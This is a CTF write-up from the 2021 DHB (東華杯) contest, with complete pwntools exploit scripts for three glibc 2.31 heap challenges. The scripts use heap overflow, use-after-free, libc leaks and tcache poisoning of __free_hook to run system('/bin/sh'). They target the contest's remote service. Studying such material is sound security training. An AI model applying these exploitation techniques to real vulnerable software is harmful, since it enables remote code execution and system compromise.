DHB东华杯_2021

这次比赛web才是重点,反而二进制是签到了

三道Pwn和学弟一起做出来的,只能说学弟tql

image-20211106152021629

image-20211106152042912

Pwn

这次三道题的远程环境都是 libc-2.31(glibc 2.31)。这一点很关键:2.31 的 tcache 还没有 safe-linking(next 指针加密)和指针对齐检查,所以下面三道题最后都用同一套手法——把 tcache 的 next 指针改成 `__free_hook`,再写入 `system` 地址,free 一个内容为 `/bin/sh` 的 chunk 即可拿到 shell。

cpp1

exp

#coding:utf-8
from pwn import *
from LibcSearcher import *
import time, sys, base64

# pwntools context: 64-bit Linux target.  'debug' logging echoes every byte
# sent and received, which is handy while developing the exploit.
context.os = 'linux'
context.arch = 'amd64'
context.log_level = 'debug'

# Target selector: 1 = spawn the binary locally, 2 = the CTF remote service,
# 3 = a listener on 127.0.0.1:12345.
debug = 2
filename = 'pwn1'

if debug == 1:
    p = process(filename)
elif debug == 2:
    p = remote('47.104.143.202', 43359)
elif debug == 3:
    p = remote('127.0.0.1', 12345)

# NOTE(review): process() is given 'pwn1' while ELF() is given './pwn1' --
# confirm the bare name resolves when running locally.
elf = ELF('./pwn1')
# The remote's libc; every offset used below (hooks, system) comes from it.
libc = ELF('libc-2.31.so')

def cmd(index):
    """Select menu entry *index* once the '>>' prompt has been seen."""
    choice = str(index)
    p.sendlineafter(b'>>', choice)

def add(index, size):
    """Menu option 1: allocate a chunk of *size* bytes under slot *index*."""
    cmd(1)
    for prompt, value in (('I:>>', index), ('S:>>', size)):
        p.sendlineafter(prompt, str(value))

def edit(index, content):
    """Menu option 2: write *content* (str or bytes) into slot *index*.

    The length written is whatever *content* holds; the binary's own bound
    check (if any) is what the exploit relies on being absent.
    """
    cmd(2)
    slot = str(index)
    p.sendlineafter(b'I:>>', slot)
    p.sendlineafter(b'V:>>', content)

def show(index):
    """Menu option 3: print slot *index*; the caller parses the leak itself."""
    cmd(3)
    slot = str(index)
    p.sendlineafter(b'I:>>', slot)

def free(index):
    """Menu option 4: free slot *index* (the slot is reusable afterwards)."""
    cmd(4)
    p.sendlineafter(b'I:>>', str(index))

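# --- heap layout ---------------------------------------------------------
# Chunk 0 is the overflow source; chunks 1-6 are 0x90-byte chunks placed
# straight after it, so chunk 1's header directly follows chunk 0's data.
add(0, 0x30)
for idx in range(1, 7):
    add(idx, 0x90)
add(7, 0x50)
add(8, 0x90)

# Overflow from chunk 0 into chunk 1's size field: 0x38 bytes fill chunk 0
# up to the neighbour's size word, then 0x421 replaces it.  0x420 is above
# the tcache limit, so free(1) puts the chunk in the unsorted bin instead.
payload = b'a' * 0x38 + p64(0x421)
edit(0, payload)
free(1)

# Carve 0x90 bytes out of the fake 0x420 chunk.  malloc first sorts it into
# a large bin and then splits it; the returned memory still holds the bin
# header pointer in its old fd slot, so show() leaks a libc address.
add(9, 0x80)
show(9)
leak = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
# 1104 (0x450) is the distance from main_arena to the large-bin header that
# holds a 0x420 chunk in glibc 2.31; __malloc_hook sits 0x10 below
# main_arena.  Assumes libc is mapped at 0x7f.. (recvuntil('\x7f')) and
# that the target really runs the libc-2.31.so loaded above.
malloc_hook_addr = leak - 1104 - 0x10
log.success('malloc_hook_addr: ' + hex(malloc_hook_addr))

# Fixed: libc_base has to be computed before anything is derived from it
# (the original added the one_gadget offset first and raised NameError).
libc_base = malloc_hook_addr - libc.sym['__malloc_hook']
system_addr = libc_base + libc.sym['system']
free_hook = libc_base + libc.sym['__free_hook']
# one_gadget candidates for this libc build; not used by the final chain,
# kept for reference only.
one = [0xe6c7e, 0xe6c81, 0xe6c84]
one_gadget = libc_base + one[2]
log.success('system_addr: ' + hex(system_addr))
log.success('one_gadget: ' + hex(one_gadget))

# --- tcache poisoning (glibc 2.31: no safe-linking, fd not validated) ----
# Two 0x90 chunks go into the same tcache bin with chunk 9 on top.  Chunk 9
# occupies the old chunk 1 position, i.e. right after chunk 0, so the same
# overflow rewrites its size (0x91, unchanged) and its tcache "next".
add(10, 0x80)
free(10)
free(9)
edit(0, b'a' * 0x38 + p64(0x91) + p64(free_hook))
add(11, 0x80)             # returns chunk 9
edit(11, '/bin/sh\x00')   # becomes the argument to system()
add(12, 0x80)             # returns __free_hook itself
edit(12, p64(system_addr))
free(11)                  # free() -> __free_hook -> system("/bin/sh")

p.interactive()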

gcc2

exp

#coding:utf-8
from pwn import *
from LibcSearcher import *
import time, sys, base64

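# pwntools context: 64-bit Linux target; 'debug' logging echoes all traffic.
context.os = 'linux'
context.arch = 'amd64'
context.log_level = 'debug'

# Target selector: 1 = spawn the binary locally, 2 = the CTF remote service,
# 3 = a listener on 127.0.0.1:12345.
debug = 2
filename = 'pwn2'

if debug == 1:
    p = process(filename)
elif debug == 2:
    # Fixed: the host string carried a trailing space ('47.104.143.202 '),
    # which makes name resolution fail instead of connecting.
    p = remote('47.104.143.202', 15348)
elif debug == 3:
    p = remote('127.0.0.1', 12345)

# NOTE(review): process() is given 'pwn2' while ELF() is given './pwn2' --
# confirm the bare name resolves when running locally.
elf = ELF('./pwn2')
# Fixed: the libc path literal was split across lines (a syntax error).
# Every libc offset below (hooks, system, main_arena) comes from this file.
libc = ELF('libc-2.31.so')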

def cmd(index):
    """Select menu entry *index* once the '>>' prompt has been seen."""
    choice = str(index)
    p.sendlineafter(b'>>', choice)

def add(index, size):
    """Menu option 1: allocate a chunk of *size* bytes under slot *index*."""
    cmd(1)
    for prompt, value in (('I:>>', index), ('S:>>', size)):
        p.sendlineafter(prompt, str(value))

def edit(index, content):
    """Menu option 2: write *content* (str or bytes) into slot *index*.

    Works on freed slots too -- that use-after-free is what the exploit uses.
    """
    cmd(2)
    slot = str(index)
    p.sendlineafter(b'I:>>', slot)
    p.sendlineafter(b'V:>>', content)

def show(index):
    """Menu option 3: print slot *index*; the caller parses the leak itself."""
    cmd(3)
    slot = str(index)
    p.sendlineafter(b'I:>>', slot)

def free(index):
    """Menu option 4: free slot *index* (the pointer is not cleared)."""
    cmd(4)
    p.sendlineafter(b'I:>>', str(index))



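# Offset of main_arena from the libc base: __malloc_hook immediately
# precedes main_arena in glibc 2.31, hence the +0x10.
main_arena_offset = libc.symbols["__malloc_hook"] + 0x10

# Three 0x70 chunks; freeing 0 then 1 leaves tcache[0x70] = 1 -> 0.
add(0, 0x67)
add(1, 0x67)
add(2, 0x67)
edit(0, 'a' * 0x10)
free(0)
free(1)

# UAF read: chunk 1's tcache "next" is chunk 0's address -> heap leak.
# 0x12ec0 is the distance from that address back to the heap start for
# this binary.  recvuntil('\x55') assumes a 0x55.. heap; under ASLR the
# heap can also land at 0x56.., in which case this parse fails -- rerun.
show(1)
heap_base = u64(p.recvuntil('\x55')[-6:].ljust(8, b'\x00')) - 0x12ec0
log.success('heap_base: ' + hex(heap_base))

# UAF write / tcache poisoning: point chunk 1's "next" at the
# tcache_perthread_struct (first chunk of the heap, user data at +0x10).
edit(1, p64(heap_base + 0x10))
add(3, 0x67)   # chunk 1 again
add(4, 0x67)   # the tcache_perthread_struct itself

# Write 0x07 into the uint16 counts[] slot for the 0x290 bin (byte offset
# 0x4e), marking it "full".  The struct is itself a 0x290 chunk, so free()
# now sends it to the unsorted bin instead of tcache and its fd becomes
# main_arena + 96 -- readable through the dangling slot 4.
edit(4, p64(0) * 9 + p64(0x0007000000000000))
free(4)
show(4)
p.recvuntil('\n')
leak = u64(p.recvline(keepends=False).ljust(8, b'\x00'))
base = leak - 96 - main_arena_offset
print(hex(base))
free_hook = base + libc.sym['__free_hook']
# Renamed from 'sys': that name shadowed the imported sys module.
system_addr = base + libc.sym['system']

# Zero the first 16 bytes of the tcache struct (counts[0..7], which also
# overlap the freed chunk's fd/bk) before the 0x70 bin is refilled.
edit(4, p64(0x0000000000000000) * 2)

# Tcache poisoning on the 0x70 bin (glibc 2.31: "next" is not validated).
free(1)
free(2)
edit(2, p64(free_hook))   # chunk 2 is the bin head; its "next" -> __free_hook
add(5, 0x67)              # returns chunk 2
edit(5, '/bin/sh\x00')    # argument for system()
add(6, 0x67)              # returns __free_hook
edit(6, p64(system_addr))

free(5)                   # free() -> __free_hook -> system("/bin/sh")

p.interactive()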

bg3

exp

#coding:utf-8
from pwn import *
from LibcSearcher import *
import time, sys, base64

# pwntools context: 64-bit Linux target; 'debug' logging echoes all traffic.
context.os = 'linux'
context.arch = 'amd64'
context.log_level = 'debug'

# Target selector: 1 = spawn the binary locally, 2 = the CTF remote service,
# 3 = a listener on 127.0.0.1:12345.  Left at 1 (local) in the writeup.
debug = 1
filename = 'pwn3'

if debug == 1:
    p = process(filename)
elif debug == 2:
    p = remote('47.104.143.202', 25997)
elif debug == 3:
    p = remote('127.0.0.1', 12345)

# NOTE(review): process() is given 'pwn3' while ELF() is given './pwn3' --
# confirm the bare name resolves when running locally.
elf = ELF('./pwn3')
# The libc every offset below is taken from; must match the target's libc.
libc = ELF('libc-2.31.so')

def cmd(index):
    """Select menu entry *index* once the 'Select:' prompt has been seen."""
    choice = str(index)
    p.sendlineafter(b'Select:', choice)

def add(index, size):
    """Menu option 1: allocate a *size*-byte buffer under slot *index*."""
    cmd(1)
    for prompt, value in (('Index:', index), ('PayloadLength:', size)):
        p.sendlineafter(prompt, str(value))

def edit(index, content):
    """Menu option 2: write *content* (str or bytes) into slot *index*.

    The length written is whatever *content* holds, not the slot's size.
    """
    cmd(2)
    slot = str(index)
    p.sendlineafter(b'Index:', slot)
    p.sendlineafter(b'BugInfo:', content)

def show(index):
    """Menu option 3: print slot *index*; the caller parses the leak itself."""
    cmd(3)
    slot = str(index)
    p.sendlineafter(b'Index:', slot)

def free(index):
    """Menu option 4: free slot *index*."""
    cmd(4)
    p.sendlineafter(b'Index:', str(index))

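# Chunk 1 (0x420 total) is above the tcache range; 0 and 2 are small chunks
# around it so it does not merge with top when freed.
add(0, 0x20)
add(1, 0x410)
add(2, 0x20)
edit(0, 'a' * 0x10)
free(0)
free(1)            # -> unsorted bin, fd/bk = main_arena + 96

# Fixed: gdb.attach() ran unconditionally, which breaks the remote run
# (debug == 2).  Only attach when the target is a local process.
if debug == 1:
    gdb.attach(p)

# Exact-fit re-allocation returns the same chunk with its fd untouched, so
# show() leaks the unsorted-bin pointer.
add(1, 0x410)
show(1)
# Assumes libc is mapped at 0x7f.. (recvuntil('\x7f')).
main_arena_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 96
log.success('main_arena_addr: ' + hex(main_arena_addr))

# __malloc_hook immediately precedes main_arena in glibc 2.31.
main_arena_offset = libc.symbols["__malloc_hook"] + 0x10
base = main_arena_addr - main_arena_offset
print(hex(base))
free_hook = base + libc.sym['__free_hook']
# Renamed from 'sys': that name shadowed the imported sys module.
system_addr = base + libc.sym['system']

free(1)            # back to the unsorted bin

# A huge request.  Walking the unsorted bin to serve it moves the 0x420
# chunk into its large bin first; what slot 3 ends up holding is not used.
# TODO(review): confirm this step is actually required for the split below.
add(3, 0x7fffffff)
add(1, 0x10)       # 0x20 chunk split off the front of the old chunk 1 region
add(5, 0x3f0)      # the 0x400 remainder, directly after the new chunk 1
add(6, 0x3f0)

free(6)
free(5)            # tcache[0x400]: 5 -> 6
# Overflow out of chunk 1 (0x18 usable bytes): 0x18 filler, then chunk 5's
# size word (0x401, rewritten unchanged), then its tcache "next" replaced by
# __free_hook.  glibc 2.31 does not validate that pointer.
edit(1, p64(0) * 3 + p64(0x401) + p64(free_hook))
add(7, 0x3f0)      # returns chunk 5
edit(7, '/bin/sh\x00')
add(8, 0x3f0)      # returns __free_hook
edit(8, p64(system_addr))
free(7)            # free() -> __free_hook -> system("/bin/sh")

p.interactive()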